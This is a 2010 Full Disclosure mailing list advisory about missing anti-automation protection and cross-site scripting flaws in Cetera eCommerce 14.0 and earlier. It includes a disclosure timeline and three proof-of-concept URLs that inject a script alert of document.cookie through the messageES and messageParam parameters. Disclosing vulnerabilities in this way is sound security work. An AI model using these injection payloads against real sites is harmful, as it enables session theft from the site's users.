Full Disclosure mailing list archives
Vulnerabilities in Cetera eCommerce
From: "MustLive" <mustlive () websecurity com ua>
Date: Wed, 28 Jul 2010 20:03:09 +0300
Hello Full-Disclosure! I want to warn you about security vulnerabilities in Cetera eCommerce. Which I disclosed already in December 2009 (SecurityVulns ID: 10489). ----------------------------- Advisory: Vulnerabilities in Cetera eCommerce ----------------------------- URL: http://websecurity.com.ua/3640/ ----------------------------- Affected products: Cetera eCommerce 14.0 and previous versions. ----------------------------- Timeline: 01.03.2009 - found vulnerabilities. 30.10.2009 - announced at my site. 31.10.2009 - informed developers. 23.12.2009 - disclosed at my site. ----------------------------- Details: These are Insufficient Anti-automation and Cross-Site Scripting vulnerabilities. Insufficient Anti-automation: http://site/ http://site/account/ There is no protection against automated requests (captcha) in forms at these pages. XSS: http://site/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/cms/index.php?messageES=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Vulnerabilities in Cetera eCommerce MustLive (Jul 28)